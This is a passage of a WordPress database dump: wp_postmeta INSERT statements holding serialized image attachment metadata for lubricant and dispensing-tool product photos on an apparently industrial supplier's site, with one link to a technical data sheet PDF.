INSERT INTO `wp_postmeta` VALUES (1154, 381, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:61:"2016/08/Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:61:"Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1155, 382, '_wp_attached_file', '2016/08/Chemours-Krytox-Group-Combo-Scale-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1156, 382, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3600;s:6:"height";i:1500;s:4:"file";s:53:"2016/08/Chemours-Krytox-Group-Combo-Scale-300-dpi.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-800x333.jpg";s:5:"width";i:800;s:6:"height";i:333;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-768x320.jpg";s:5:"width";i:768;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Combo-Scale-300-dpi-1600x667.jpg";s:5:"width";i:1600;s:6:"height";i:667;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"Chemours-Krytox-Group-Combo-Scale-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1157, 383, '_wp_attached_file', '2016/08/Chemours-Krytox-Group-Grease-Scale-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1158, 383, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:54:"2016/08/Chemours-Krytox-Group-Grease-Scale-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:54:"Chemours-Krytox-Group-Grease-Scale-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1159, 384, '_wp_attached_file', '2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1160, 384, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:51:"2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"Chemours-Krytox-Group-Oil-Scale-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1161, 385, '_wp_attached_file', '2016/08/Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1162, 385, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:50:"2016/08/Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:50:"Chemours-Krytox-OIL-0.5-kg-Jar-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1163, 386, '_wp_attached_file', '2016/08/Chemours-Krytox-OIL-1-kg-Bottle-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1164, 386, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:51:"2016/08/Chemours-Krytox-OIL-1-kg-Bottle-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"Chemours-Krytox-OIL-1-kg-Bottle-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1165, 387, '_wp_attached_file', '2016/08/Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1166, 387, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:55:"2016/08/Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:55:"Chemours-Krytox-OIL-5-kg-Handle-Jug-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1167, 388, '_wp_attached_file', '2016/08/Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1168, 388, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:54:"2016/08/Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:54:"Chemours-Krytox-OIL-20-kg-5gal-Jug-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1169, 389, '_wp_attached_file', '2016/08/Dab-O-Matic.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1170, 389, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:3676;s:4:"file";s:23:"2016/08/Dab-O-Matic.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Dab-O-Matic-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Dab-O-Matic-650x800.jpg";s:5:"width";i:650;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Dab-O-Matic-768x945.jpg";s:5:"width";i:768;s:6:"height";i:945;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Dab-O-Matic-1301x1600.jpg";s:5:"width";i:1301;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Dab-O-Matic-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Dab-O-Matic-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Dab-O-Matic-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Dab-O-Matic-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1171, 390, '_wp_attached_file', '2016/08/Needle-Nose.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1172, 390, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:4287;s:4:"file";s:23:"2016/08/Needle-Nose.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Needle-Nose-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Needle-Nose-558x800.jpg";s:5:"width";i:558;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"Needle-Nose-768x1102.jpg";s:5:"width";i:768;s:6:"height";i:1102;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Needle-Nose-1115x1600.jpg";s:5:"width";i:1115;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Needle-Nose-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Needle-Nose-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Needle-Nose-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Needle-Nose-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1173, 391, '_wp_attached_file', '2016/08/Syringe.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1174, 391, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:1452;s:4:"file";s:19:"2016/08/Syringe.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"Syringe-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"Syringe-800x389.jpg";s:5:"width";i:800;s:6:"height";i:389;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"Syringe-768x373.jpg";s:5:"width";i:768;s:6:"height";i:373;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"Syringe-1600x778.jpg";s:5:"width";i:1600;s:6:"height";i:778;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"Syringe-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"Syringe-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"Syringe-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"Syringe-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1179, 347, '318_custom_list_file', 'a:1:{s:32:"453f1230407deb37cf6bf4b3cd427c5e";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (1574, 400, '_edit_lock', '1496664299:3'); 
INSERT INTO `wp_postmeta` VALUES (1575, 400, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (1576, 401, '_wp_attached_file', '2016/08/Windmill-ReleaSys82.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1577, 401, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/08/Windmill-ReleaSys82.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"Windmill-ReleaSys82-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"Windmill-ReleaSys82-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3